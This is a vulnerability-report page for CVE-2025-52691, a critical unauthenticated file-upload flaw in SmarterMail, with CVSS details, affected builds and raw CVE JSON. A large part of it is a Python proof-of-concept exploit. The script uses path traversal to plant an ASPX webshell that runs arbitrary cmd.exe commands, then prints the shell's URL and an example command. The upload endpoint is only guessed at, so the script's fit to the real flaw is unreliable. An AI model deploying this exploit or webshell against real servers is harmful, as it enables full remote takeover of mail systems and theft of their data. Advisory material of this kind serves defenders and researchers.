Security Vulnerability Report
中文
CVE-2025-52691 CVSS 10.0 CRITICAL

CVE-2025-52691

Published: 2025-12-29 03:15:43
Last Modified: 2026-01-27 15:28:07
Source: 5f57b9bf-260d-4433-bf07-b6a79e9bb7d4

Description

Successful exploitation of the vulnerability could allow an unauthenticated attacker to upload arbitrary files to any location on the mail server, potentially enabling remote code execution.

CVSS Details

CVSS Score
10.0
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:smartertools:smartermail:*:*:*:*:*:*:*:* - VULNERABLE
SmarterMail < Build 8064
SmarterMail Enterprise < Build 8064

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-52691 SmarterMail Arbitrary File Upload PoC # Target: SmarterMail server (unauthenticated) # Impact: Remote Code Execution import requests import sys def exploit_smartermail(target_url, attacker_ip, attacker_port): """ Exploit CVE-2025-52691: Unauthenticated arbitrary file upload Uploads a webshell to the SmarterMail server """ # Webshell content - ASPX webshell for Windows/.NET environment webshell = ''' <%@ Page Language="C#" %> <%@ Import Namespace="System.Diagnostics" %> <script runat="server"> void Page_Load(object sender, EventArgs e) { string cmd = Request.QueryString["cmd"]; if (cmd != null) { ProcessStartInfo psi = new ProcessStartInfo(); psi.FileName = "cmd.exe"; psi.Arguments = "/c " + cmd; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; Process p = Process.Start(psi); Response.Write(p.StandardOutput.ReadToEnd()); } } </script> ''' # Target path for webshell upload (using path traversal) upload_path = "../../../../../../../../../../wwwroot/webshell.aspx" # File upload endpoint (typical SmarterMail upload endpoint) upload_url = f"{target_url}/WebResources/AttachFile" # Construct multipart form data request files = { 'file': ('webshell.aspx', webshell, 'application/x-aspx') } data = { 'path': upload_path } headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Accept': '*/*' } print(f"[*] Target: {target_url}") print(f"[*] Uploading webshell to: {upload_path}") try: # Send malicious file upload request response = requests.post( upload_url, files=files, data=data, headers=headers, timeout=30 ) if response.status_code == 200: print("[+] File uploaded successfully!") webshell_url = f"{target_url}/webshell.aspx" print(f"[+] Webshell URL: {webshell_url}") print(f"[+] Example command: {webshell_url}?cmd=whoami") return True else: print(f"[-] Upload failed. Status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-52691.py <target_url>") print("Example: python cve-2025-52691.py http://vulnerable-server:2000") sys.exit(1) target = sys.argv[1].rstrip('/') exploit_smartermail(target, "attacker_ip", 4444)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52691", "sourceIdentifier": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4", "published": "2025-12-29T03:15:42.837", "lastModified": "2026-01-27T15:28:07.247", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Successful exploitation of the vulnerability could allow an unauthenticated attacker to upload arbitrary files to any location on the mail server, potentially enabling remote code execution."}], "metrics": {"cvssMetricV31": [{"source": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "cisaExploitAdd": "2026-01-26", "cisaActionDue": "2026-02-16", "cisaRequiredAction": "Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.", "cisaVulnerabilityName": "SmarterTools SmarterMail Unrestricted Upload of File with Dangerous Type Vulnerability", "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:smartertools:smartermail:*:*:*:*:*:*:*:*", "versionEndExcluding": "100.0.9413", "matchCriteriaId": "A9F4301A-C277-47F6-841D-386EDD24EE67"}]}]}], "references": [{"url": "https://www.csa.gov.sg/alerts-and-advisories/alerts/al-2025-124/", "source": "5f57b9bf-260d-4433-bf07-b6a79e9bb7d4", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/watchtowrlabs/watchTowr-vs-SmarterMail-CVE-2025-52691?ref=labs.watchtowr.com", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-52691", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["US Government Resource"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.